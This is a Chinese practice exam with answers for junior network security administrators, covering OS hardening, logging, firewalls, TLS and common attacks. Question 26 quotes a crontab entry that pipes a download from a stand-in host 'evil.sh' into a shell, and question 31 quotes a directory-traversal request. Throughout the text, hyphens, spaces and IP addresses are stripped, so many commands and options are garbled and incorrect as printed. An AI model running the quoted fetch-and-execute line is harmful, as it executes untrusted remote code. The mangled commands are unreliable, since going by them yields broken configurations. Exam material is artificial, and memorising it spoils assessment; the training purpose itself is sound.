网络安全管理员初级工模拟考试题与答案

网络安全管理员初级工模拟考试题与答案一、单项选择题（每题1分，共40分。每题只有一个正确答案，请将正确选项填入括号内）1.在WindowsServer2019中，若需强制所有域用户下次登录时必须修改密码，应在“ActiveDirectory用户和计算机”中勾选哪一项属性？（）A.用户不能更改密码B.密码永不过期C.用户下次登录时须更改密码D.账户已禁用答案：C2.某企业防火墙采用状态检测机制，当内网主机首次访问外网Web服务器时，防火墙最先检查的数据单元是（）A.应用层HTTP头B.传输层TCP三次握手标志位C.网络层IP分片偏移量D.数据链路层MAC地址答案：B3.下列哪条Linux命令可实时查看当前系统所有活跃网络连接及其对应的进程PID？（）A.sstunpB.netstatrC.lsofiD.tcpdumpnn答案：A4.在SSL/TLS握手阶段，服务器发送的Certificate消息中不包含以下哪项内容？（）A.服务器公钥B.证书颁发者名称C.私钥签名值D.证书有效期答案：C5.依据《网络安全法》，关键信息基础设施运营者采购网络产品或服务时，应当履行的安全义务是（）A.向工信部备案B.通过国家网络安全审查C.取得ISO27001认证D.签署源代码托管协议答案：B6.某员工收到一封伪装成HR的钓鱼邮件，点击链接后浏览器地址栏出现“”，攻击者利用了哪种技术？（）A.DNS劫持B.同形异义字PunycodeC.IP碎片攻击D.ARP欺骗答案：B7.在Windows日志中，事件ID4625表示（）A.账户成功登录B.账户登录失败C.特权对象被访问D.系统时间被更改答案：B8.下列关于WAF（Web应用防火墙）的说法，错误的是（）A.可基于正则规则拦截SQL注入B.可解密HTTPS流量进行检测C.可完全替代Web服务器补丁更新D.可部署在反向代理模式答案：C9.使用nmap扫描目标主机“00”的Top1000端口，命令为（）A.nmapsSF00B.nmapsTp00C.nmapsUtopports100000D.nmapsS00答案：D10.在Linux系统中，若需禁止普通用户通过Ctrl+Alt+Del重启服务器，应修改哪一文件？（）A./etc/inittabB./etc/systemd/system/ctrlaltdel.targetC./etc/securettyD./etc/issue答案：B11.以下哪项不属于对称加密算法？（）A.SM4B.AES256GCMC.ECCD.3DES答案：C12.某云服务器开启安全组，默认拒绝所有入站流量，若需允许仅来自“/24”的SSH访问，应添加的规则是（）A.方向：入站，协议：TCP，端口：22，源：/0B.方向：入站，协议：TCP，端口：22，源：/24C.方向：出站，协议：TCP，端口：22，源：/24D.方向：入站，协议：UDP，端口：22，源：/24答案：B13.在Apache配置中，若要禁止解析/var/www/uploads目录下的PHP文件，应添加（）A.RemoveHandler.phpB.php_flagengineoffC.DenyfromallD.OptionsExecCGI答案：B14.某攻击者通过伪造源IP向目标发送大量SYN包，耗尽半开连接表，这种攻击称为（）A.SYNFloodB.UDPFloodC.SmurfD.TearDrop答案：A15.在Windows中，使用哪条命令可查看当前登录用户的访问令牌？（）A.whoami/allB.netuserC.gpresult/hD.tasklist/v答案：A16.下列哪项不是社会工程学攻击的常见手段？（）A.假冒客服电话索要验证码B.在会议室丢弃带有恶意U盘C.利用零日漏洞远程执行代码D.伪造紧急邮件诱导转账答案：C17.在MySQL8.0中，若需启用“mysql_native_password”插件兼容旧客户端，应执行（）A.INSTALLPLUGINmysql_native_passwordSONAME'mysql_native_password.so';B.CREATEUSER'user'@'%'IDENTIFIEDWITHmysql_native_passwordBY'pwd';C.SETGLOBALpluginloadadd=mysql_native_password;D.ALTERUSER'user'@'%'REQUIRESSL;答案：B18.某企业采用802.1X对办公网接入进行认证，认证协议选用EAPTLS，终端必须安装（）A.用户名密码B.数字证书C.短信令牌D.硬件TOTP答案：B19.在Linux中，若需限制用户“tom”的最大进程数为200，应在/etc/security/limits.conf中添加（）A.tomhardnproc200B.@tomsoftnproc200C.tommaxproc200D.hardnproc200答案：A20.下列关于IPv6安全特性的描述，正确的是（）A.邻居发现协议（NDP）天然免疫欺骗攻击B.IPSec为IPv6强制启用，无需额外配置C.链路本地地址以fe80::/10开头D.无状态地址自动分配可杜绝地址扫描答案：C21.在WindowsDefender防火墙中，预定义规则“远程桌面用户模式（TCPIn）”默认端口为（）A.3389B.5985C.445D.135答案：A22.某网站使用JWT作为会话令牌，若签名算法字段“alg”被改为“none”，可导致（）A.令牌立即失效B.令牌被强制刷新C.绕过签名验证D.触发密钥轮换答案：C23.在Linux中，若需查看文件/etc/shadow的最近访问时间，应使用（）A.stat/etc/shadowB.lsl/etc/shadowC.file/etc/shadowD.md5sum/etc/shadow答案：A24.下列哪项不是OWASPTop102021新增风险？（）A.不安全的设计B.软件与数据完整性故障C.跨站脚本D.服务器端请求伪造答案：C25.在CiscoIOS中，启用SSH并禁用Telnet，应配置（）A.transportinputsshB.ipsshversion1C.linevty015loginlocalD.noiptelnet答案：A26.某管理员发现Crontab中被添加“curlhttp://evil.sh|sh”，其首要应急操作是（）A.重启服务器B.立即删除任务并检查curl进程C.关闭80端口D.修改root密码答案：B27.在Windows中，使用哪条命令可查看当前系统开放端口对应的PID？（）A.netstatanoB.ipconfig/allC.arpaD.routeprint答案：A28.下列关于云原生安全的描述，错误的是（）A.容器逃逸可能导致宿主机被控制B.Kubernetes默认启用RBACC.镜像仓库应开启签名验证D.Sidecar代理可增强微服务通信安全答案：B29.在Linux中，若需禁止ping，应设置内核参数（）A.net.ipv4.icmp_echo_ignore_all=1B.net.ipv4.tcp_syncookies=1C.net.ipv4.ip_forward=0D.net.ipv4.conf.all.rp_filter=1答案：A30.某企业采用双因子认证，以下组合中安全性最低的是（）A.指纹+短信B.密码+硬件UKeyC.密码+邮箱验证码D.人脸+动态令牌答案：C31.在Apache日志中，出现“../..\winnt\system32\cmd.exe”请求，最可能的攻击是（）A.目录遍历B.SQL注入C.XSSD.CSRF答案：A32.在Windows中，若需查看当前系统所有本地用户组，应使用（）A.netlocalgroupB.netgroupC.netuserD.netaccounts答案：A33.下列哪项不是数据备份的“321”原则内容？（）A.至少3份副本B.使用2种不同介质C.其中1份离线D.每天3次增量备份答案：D34.在Linux中，若需对/var/log/audit/audit.log进行实时审计，应使用（）A.auditctlw/var/log/audit/audit.logpwaklog_changeB.ausearchf/var/log/audit/audit.logC.aureportfD.auditds答案：A35.某网站使用HSTS防御协议降级，其响应头应为（）A.StrictTransportSecurity:maxage=31536000B.XFrameOptions:DENYC.ContentSecurityPolicy:defaultsrc'self'D.XXSSProtection:1答案：A36.在Windows中，若需查看当前系统所有计划任务，应使用（）A.schtasks/query/foLIST/vB.tasklist/svcC.wmicjoblistD.at答案：A37.下列关于勒索病毒防御的说法，错误的是（）A.及时打补丁可减少攻击面B.关闭宏可阻断Office文档传播C.安装杀毒软件即可100%免疫D.网络分段可限制横向移动答案：C38.在Linux中，若需查看当前系统所有已加载的内核模块，应使用（）A.lsmodB.modprobelC.dmesgD.lsof答案：A39.某企业采用VPN远程接入，若需记录用户拨入日志，应在WindowsRRAS中启用（）A.事件查看器→远程访问B.网络策略服务器→记账C.本地安全策略→审核登录事件D.系统日志→DNS答案：B40.在CiscoASA中，若需查看当前ACL命中计数，应使用（）A.showaccesslistB.showrunaccesslistC.showconnD.showinterface答案：A二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）41.以下哪些措施可有效降低暴力破解SSH密码的风险？（）A.修改默认端口B.启用Fail2banC.禁用密码改用密钥登录D.关闭TCPWrapper答案：A、B、C42.关于Docker安全，以下说法正确的有（）A.容器共享宿主内核B.使用非root用户运行容器可降低风险C.开启privileged选项可增强隔离D.镜像扫描可检测已知CVE答案：A、B、D43.以下哪些事件会触发Windows安全日志ID4688？（）A.创建新进程B.删除用户账户C.启用审核进程跟踪D.进程命令行参数被记录答案：A、C、D44.以下哪些属于网络层攻击？（）A.ICMP重定向B.SYNFloodC.ARP欺骗D.Smurf攻击答案：A、B、D45.以下哪些工具可用于内存取证？（）A.VolatilityB.RekallC.WiresharkD.Memoryze答案：A、B、D46.以下哪些配置可增强ApacheSSL安全性？（）A.SSLProtocolallSSLv3TLSv1TLSv1.1B.SSLCipherSuiteHIGH:!aNULL:!MD5C.SSLHonorCipherOrderonD.SSLCertificateChainFile跳过中间证书答案：A、B、C47.以下哪些属于个人信息保护法中的敏感个人信息？（）A.生物识别信息B.十四岁以下未成年人信息C.购物记录D.医疗健康信息答案：A、B、D48.以下哪些命令可用于Linux系统完整性检查？（）A.aidecheckB.rpmVaC.chkrootkitD.tripwirecheck答案：A、B、D49.以下哪些措施可防止CSRF攻击？（）A.验证Referer头B.使用CSRFTokenC.设置SameSiteCookie属性D.启用CORS任意域名答案：A、B、C50.以下哪些端口常被用于远程桌面协议？（）A.3389B.5900C.5985D.5938答案：A、C三、判断题（每题1分，共10分。正确打“√”，错误打“×”）51.在Linux中，文件权限为“rwrr”表示所有者可写，其他用户可执行。（）答案：×52.WindowsDefender防火墙出站规则默认允许所有流量。（）答案：√53.使用HTTPS的网站一定不存在钓鱼风险。（）答案：×54.在Kubernetes中，PodSecurityPolicy已被废弃，由PodSecurityStandards替代。（）答案：√55.将敏感数据写入GitHub公开仓库属于供应链攻击。（）答案：×56.在SQL注入中，使用参数化查询可有效防御。（）答案：√57.关闭Windows的“远程注册表”服务可减少攻击面。（）答案：√58.在Linux中，/etc/passwd文件存储用户密码哈希。（）答案：×59.使用弱加密算法（如DES）比明文传输更安全。（）答案：×60.零信任架构默认信任内网流量。（）答案：×四、填空题（每空1分，共20分）61.在Linux中，查看当前系统版本的命令是________。答案：unamea62.Windows事件日志文件默认存储路径为________。答案：C:\Windows\System32\winevt\Logs63.在SSL/TLS中，用于协商对称密钥的算法称为________算法。答案：密钥交换64.国家互联网应急中心英文缩写为________。答案：CNCERT65.在MySQL中，撤销用户权限的命令是________。答案：REVOKE66.在Apache中，用于隐藏版本号的指令是________。答案：ServerTokensProd67.在Linux中，禁止root远程SSH登录的配置项为________。答案：PermitRootLoginno68.在Windows中，查看当前登录用户的SID可使用命令________。答案：whoami/user69.在Kubernetes中，用于限制容器CPU使用的资源字段为________。答案：limits.cpu70.在Cisco交换机中，启用端口安全的命令为________。答案：switchportportsecurity71.在Linux中，查看当前监听TCP80端口的进程命令为________。答案：sstunlp|grep:8072.在Windows中，本地安全策略管理控制台命令为________。答案：secpol.msc73.在密码学中，HMAC的作用是提供________和________。答案：完整性、认证74.在Docker中，查看镜像历史层的命令为________。答案：dockerhistory75.在Linux中，设置文件不可变属性的命令为________。答案：chattr+i76.在Windows中，查看当前ARP缓存表的命令为________。答案：arpa77.在SSL/TLS中，OCSP的作用是________。答案：在线证书状态查询78.在Linux中，查看系统启动时间的命令为________。答案：uptimes79.在Apache中，配置日志格式的指令为________。答案：LogFormat80.在Windows中，查看当前用户所属组的命令为________。答案：netuser%username%